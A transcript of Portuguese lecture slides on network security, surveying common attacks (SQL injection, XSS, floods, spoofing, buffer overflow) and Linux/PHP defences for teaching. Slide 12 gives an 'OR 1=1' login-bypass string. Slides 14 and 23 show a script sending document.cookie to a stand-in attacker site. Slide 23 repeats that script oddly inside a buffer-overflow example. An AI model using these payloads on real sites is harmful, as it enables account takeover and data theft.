Segurança de-redes

1,369 views
1,228 views

Published on

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,369
On SlideShare
0
From Embeds
0
Number of Embeds
8
Actions
Shares
0
Downloads
52
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Segurança de-redes

  1. 1. Segurança de redes não écoisa de moleque!Leandro Almeidalcavalcanti.almeida@gmail.comwww.leandrocalmeida.com
  2. 2. - Professor Universitário - IFPB - Estácio (iDEZ)-Especialista em Segurança daInformação-Mestrando em Informática- Certificado ITILv3- Fedora Ambassadors- Sócio-diretor da YouTI
  3. 3. Nosso chefe sempre tem um sobrinho que resolve tudo de informática! Eu tenho um sobrinho que instala um antivírus que é uma beleza! E o melhor é que eu não gasto nada
  4. 4. O problema é que os sobrinhos não aguentam o tranco!
  5. 5. Negócios Tecnologia da Informação Segurança da InformaçãoIntegridade Confidencialidade DisponibilidadePessoas Processos Tecnologias
  6. 6. NegóciosSegurança da SegurançaInformação de Redes
  7. 7. Incidentes de Segurança Fonte: www.cert.br
  8. 8. Aplicações em rede precisamobedecer o Modelo deCamadas
  9. 9. Modelo OSI Modelo TCP/IP Aplicação AplicaçãoApresentação Sessão Transporte Transporte Rede Rede Enlace Enlace Física Física
  10. 10. Ataques – Redes de Computadores- Engenharia Social- ARP Spoofing- DoS / DDoS / DoS Layer 7- Sql Injection- XSS- MAC Spoofing- IP Spoofing- Website Defacement- Pragas Virtuais (Vírus, Worms,...)
  11. 11. AtaquesAplicação Sql Injection XSS DoS HTTP Buffer OverflowTransporte TCP SYN FLOOD UDP FLOOD Main in the Middle Rede IP Spoofing ICMP Flooding STP Attack Enlace ARP Spoofing ARP Poisoning Físico MAC Spoofing
  12. 12. SQL Injection Ex : Sistema de autenticação em PHPImagine se o usuário inserir os dados abaixo...Login: qualquer coisaSenha: OR 1=1SELECT * FROM usuarios WHERE login=qualquer coisa AND senha = OR 1=1 Essa query SQL retornará todos os registros da tabela usuários!
  13. 13. SQL Injection Casos ReaisWebsite Mysqlhttp://www.computerworld.com/s/article/9215249/MySQL_Web_site_falls_victim_to_SQL_injection_attackSonyhttp://www.bbc.co.uk/news/technology-13642145Distrito Federalhttp://www.linhadefensiva.org/2008/05/ataques-de-sql-injection-atingem-sites-brasileiros/
  14. 14. XSSSuposição:Facebook vulnerável a Cross-Site Scripting Usuário ingênuo clica no link... <script> Document.location = http://sitedocracker.com/roubarcokkies.php= + document.cookie </script>Insere um código(html, Javascript,...) malicioso no lugar de um post nabase de dados do facebook
  15. 15. XSSCasos Reais
  16. 16. DoS HTTP GET SYN SYN-ACK ACK GET /index.php ACK Pragma: 1010 ... Erro 408 – Request Timeout
  17. 17. História...- Avenge Assange – 2010 (Prisão de JulianAssange - Wikileaks) – Alvo: Mastecard- Sony – 2011 (Sony processou a GEOHOT pelodesbloqueio do PS3) - Alvo: PSN (77 milhões de pessoas sem PSN)- Megaupload – 2012 (Prisão de Kim Dotcom) - Alvo: FBI
  18. 18. DoS HTTP GETEstatísticas - CPU
  19. 19. DoS HTTP GETEstatísticas - CPU
  20. 20. DoS HTTP GETEstatísticas - Memória
  21. 21. DoS HTTP GETEstatísticas - Conexões
  22. 22. DoS HTTP POST SYN SYN-ACK ACK POST / inserir.html ACK Continuação do POST ... Erro 400 – Bad Request
  23. 23. Buffer Overflowchar nome[4]; int idade; L E O 0 2 0Entrada: LEO idade: 20char nome[4]; int idade; L E O O A 0 <script> Document.location = http://sitedocracker.com/roubarcokkies.php= + document.cookie </script>Entrada: LEOOA idade: 65
  24. 24. Buffer Overflow Casos Reais
  25. 25. Ataques ao SSH- CERT Advisory CA-2002-18 OpenSSHVulnerabilities in Challenge Response Handling- USN-649-1: Openssh Vulnerabilities- Openssh Security Advisory: cbc.adv – PlaintextRecovery Attack Against SSH CPNI-957037- CPNI Vulnerability Advisory SSH – CPNI-957037- Openssh vulnerability CVE-2008-0166,http://www.ubuntu.com/usn/usn-612-1
  26. 26. TCP SYN FLOOD SYN SYN-ACK SYN SYN SYN SYN SYN SYN
  27. 27. UDP FLOOD UDP – porta qualquer UDP – porta qualquer UDP – porta qualquer UDP – porta qualquer UDP – porta qualquer UDP – porta qualquer
  28. 28. Main in the Middle Packet Packet Packet Packet
  29. 29. IP Spoofing Packet Packet10.0.0.1 Packet Packet 10.0.0.254 Packet Packet Atacante envia pacotes IP falsificados para a vítima, se passando por outro host na10.0.0.1 rede!
  30. 30. ICMP Flooding ICMP – echo request ICMP – echo request ICMP – echo request ICMP – echo request ICMP – echo request ICMP – echo request
  31. 31. Spanning Tree Attack Packet Packet VLAN 2VLAN 1 PacketPacket Packet Packet Packet Packet Packet Atacante se torna Root bridge Packet Packet VLAN 1 Packet Packet VLAN 1 VLAN 3 VLAN 1 VLAN 2 VLAN 2
  32. 32. ARP Spoofing Packet PacketIP: 10.0.0.1MAC: Packet68:A3:C4:9B:73:54 IP: 10.0.0.254 Packet MAC: 52:54:00:69:42:4A arpspoof Packet Packet Atacante envia pacotes ARP falsificadosIP: 10.0.0.2 para a vítima, se passando por outro hostMAC: na rede!68:A3:C4:9B:73:54
  33. 33. ARP PoisoningIP: 10.0.0.1MAC:68:A3:C4:9B:73:54 1 MAC IP: 10.0.0.254 2 MAC MAC: 52:54:00:69:42:4A Packet 3 MAC 4 MAC 5 MAC 6 MAC Atacante envenena a tabela ARP do SwitchIP: 10.0.0.2MAC: 68:A3:C4:9B:73:54
  34. 34. MAC Spoofing Packet Packet68:A3:C4:9B:73:54 Packet 52:54:00:69:42:4A Packet Packet Atacante envia pacotes com endereço MAC falsificado para a vítima, se passando por68:A3:C4:9B:73:54 outro host na rede!
  35. 35. Como se proteger ?
  36. 36. Como se proteger ?- XSS e SQL Injection - Filtrar os dados de entrada - filter_input (PHP) - Escapar os dados de saída - MySQL: mysql_real_escape_string() - PostgreSQL: pg_escape_string() - htmlentities,htmlespecialchars - Procure saber sobre o que é OWASP
  37. 37. Como se proteger ?- Buffer Overflow - Filtrar os dados de entrada - Verificar se a linguagem não checa se umnúmero maior de dados pode ser armazenadoem um buffer - No exemplo citado, use software originale o mantenha sempre atualizado
  38. 38. Como se proteger ?- Ataques ao SSH - Single Packet Authorization ssh L I B P ssh connection refused C A P SPA Packet iptables -A INPUT -i eth0 -p tcp –dport 22 -j REJECT iptables -A INPUT -i eth0 -p tcp –dport 22 -s 10.0.0.1 -j ACCEPT ssh ssh connection accept
  39. 39. Como se proteger ?- DoS HTTP GET/POST Tentativas... - TCP SYN Cookies - echo 1 > /proc/sys/net/ipv4/tcp_syncookies - Instalar o mod_qos no Apache
  40. 40. Como se proteger ?- TCP/UDP/ICMP Flood Existem tentativas de soluções com o módulo “limit” do iptables...
  41. 41. Como se proteger ?- IP Spoofing - Ativar o rp_filter(Reverse Path) via kernel Echo 1 > /proc/sys/net/ipv4/conf/default/rp_filter - Rejeita os pacotes quando a rota desaída difere da rota de entrada
  42. 42. Como se proteger ?- ARP Poisoning/Spoofing - Uso do Port Security - Mac Biding (atrelar MAC a IP) - Uso de ferramentas como rarp / arpwatch
  43. 43. Perguntas ?
  44. 44. Vida longa e próspera!
  45. 45. Obrigado!Contatos: lcavalcanti.almeida@gmail.com www.leandrocalmeida.com @leandrocalmeida www.fb.com/leandrocalmeida

×